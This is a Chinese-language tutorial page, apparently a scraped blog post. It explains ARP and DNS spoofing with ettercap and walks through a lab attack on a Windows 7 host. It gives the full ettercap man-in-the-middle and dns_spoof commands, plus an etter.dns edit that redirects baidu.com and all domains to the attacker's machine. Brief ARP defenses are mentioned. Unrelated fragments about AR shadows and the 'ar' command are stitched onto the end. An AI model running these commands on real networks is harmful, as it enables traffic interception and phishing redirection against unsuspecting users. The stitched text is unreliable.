ettercap:剛開始只是作為乙個網路嗅探器,但在開發過程中,它獲得了越來越多的功能,在中間的攻擊人方面,是乙個強大而又靈活的工具。它支援很多種協議(即使是加密的),包括網路和主機產品特徵分析,還有dns欺騙等等。
簡單原理:
主機a說自己是閘道器,騙將發給閘道器的資料發給主機a,然後由主機a傳送給真正的閘道器。
主機a告訴閘道器它就是主機b,騙將發給b的資料發給主機a,然後由a**給主機b。
如何防止arp欺騙:
劃分vlan和繫結靜態的arp表,靜態arp表有個弊端就是,如果你繫結的那台舊主機拆走了,接進來另外一台新主機,而你的arp表存的舊主機的mac,這樣資料報就**不出去了,很坑吧,哈哈。
dns欺騙:
其實dns欺騙不能叫欺騙,為什麼這麼說,因為dns解析採取就近原則,意思是說誰能先幫我解析我就聽誰的。給你解析乙個假的ip就是欺騙。例如本來www.baidu.com 對應ip是202.16.25.78 ,你在本地架設乙個dns伺服器將www.baidu.com 解析為192.168.100.2 , 這不就等於騙了別人嗎。
dns解析過程是這樣的:先通過本機的host檔案解析,如果不能解析,就讓最近的dns伺服器解析 。其實dns解析還分為遞迴解析和迭代解析。這裡不解釋。
實驗環境:
kali ip:192.168.11.103
windows7 ip:192.168.11.104
前提:
你和你要欺騙的主機在同一區域網。
你所在區域網沒有被劃分vlan。
wget -r -p -np
命令格式:
ettercap -tq -i 網絡卡 -m arp:remote /要欺騙的ip// /閘道器ip//
欺騙的主機是192.168.11.104 ,閘道器是192.168.11.1
重要一步:修改 vim /etc/ettercap/etter.dns
追加格式例如 :
www.baidu.com a 192.168.11.103(寫本機的ip) ##將www.baidu.com 解析到本機
*.*.* a 192.168.11.103 ##將所有網域名稱解析到本機
命令格式:
ettercap -tq -i eth0 -m arp:remote -p dns_spoof /要欺騙的ip// /閘道器的ip//
ettercap -tq -i eth0 -m arp:remote -p dns_spoof /192.168.11.104// /192.168.11.1//
AR 關於AR實時陰影的製作
原作者 大家都知道,ar本身對平行光的陰影是不現實的,之前用過momo的乙個方法實現了實時陰影,但是效果不是非常好,後面在論壇中發現了乙個比較實用的方法。話不多說,切入正題。首先 寫乙個shader用來作為接收光照陰影 properties cutoff alpha cutoff range 0,1...
ar命令詳解
在找到乙個man手冊上的翻譯。維護鏈結編輯器使用的索引庫。ar c l g o s v c t z x archivefile file ar c l g o s v c t z positionname x archivefile file ar c l g o s v c t z x archi...
ar命令用法
ar基本用法 ar命令可以用來建立 修改庫,也可以從庫中提出單個模組。庫是一單獨的檔案,裡面包含了按照特定的結構組織起來的其它的一些檔案 稱做此庫檔案 的member 原始檔案的內容 模式 時間戳 屬主 組等屬性都保留在庫檔案中。下面是ar命令的格式 ar abcfilnopssuvv member...